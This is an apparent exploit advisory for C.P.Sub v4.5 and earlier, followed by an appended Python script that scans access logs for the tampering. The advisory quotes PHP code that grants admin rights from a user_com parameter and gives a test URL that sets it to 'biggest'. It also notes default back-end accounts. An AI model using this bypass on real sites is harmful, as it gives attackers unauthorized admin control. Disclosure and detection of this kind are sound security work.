#!/usr/bin/python
#
# Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication
# Date: 2013/6/27
# Author: Chako
# Vendor: https://www.cooltey.org/ping/php.php
# Software Download Link: https://cooltey.myweb.hinet.net/cpsub_v4.5.zip
# Version: <= v4.5
# Tested on: Windows 7
#
####################################################################

Improper Authentication:
==========================================

Overview:
    C.P.Sub <= v4.5 uses the "user_com=" parameter to decide whether the user has admin privilege.
    Therefore an attacker could simply change the value of the "user_com=" parameter to gain admin privilege.

/check.php (LINE: 36-44)
--------------------------------------------------------------
if($_GET[user_com] != "")
{
  $user_com = $_GET[user_com];
}elseif($_POST[user_com] != "")
{
  $user_com = $_POST[user_com];
}
if($user_com == "biggest")
{
--------------------------------------------------------------

Test:
--------------------------------------------------------------
  change /info.php?cookie=yes&user_com=second
  to https://Example_Target/info.php?cookie=yes&user_com=biggest


Misconfiguration
==========================================
There are some default accounts in C.P.Sub <= v4.5 that allow an attacker to access the back-end management page.
This could lead to further attacks.
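A detection sketch for the "user_com=" tampering described under Improper Authentication, added here as an example and not part of the original advisory: it scans web server access logs for requests whose URL sets user_com to the admin value and notes whether the same client previously sent a different value. The combined log format, the sample lines and the function name find_admin_claims are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IPs, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [27/Jun/2013:10:01:02 +0000] "GET /info.php?cookie=yes&user_com=second HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Jun/2013:10:01:09 +0000] "GET /info.php?cookie=yes&user_com=biggest HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.4 - - [27/Jun/2013:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Jun/2013:10:03:00 +0000] "GET /info.php?user_com=%62iggest HTTP/1.1" 200 4096 "-" "curl/7.30"
"""

# Captures: client, timestamp, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
PARAM = "user_com"
ADMIN_VALUE = "biggest"  # the value check.php compares against, per the advisory


def find_admin_claims(log_text):
    """Flag requests whose URL sets user_com to the admin value.

    'switched' is True when the same client earlier sent a different
    user_com value, i.e. the claimed role changed between requests.
    """
    seen_other = set()  # clients that already sent a non-admin user_com
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, ts, method, target, status = m.groups()
        parts = urlsplit(target)
        # parse_qs percent-decodes names and values before we compare
        values = parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])
        if ADMIN_VALUE in values:
            findings.append({"client": client, "time": ts, "method": method,
                             "path": parts.path, "status": int(status),
                             "switched": client in seen_other})
        elif values:
            seen_other.add(client)
    return findings


if __name__ == "__main__":
    for finding in find_admin_claims(SAMPLE_LOG):
        print(finding)
```

check.php also reads user_com from POST data, which access logs normally do not record, so this covers GET requests only.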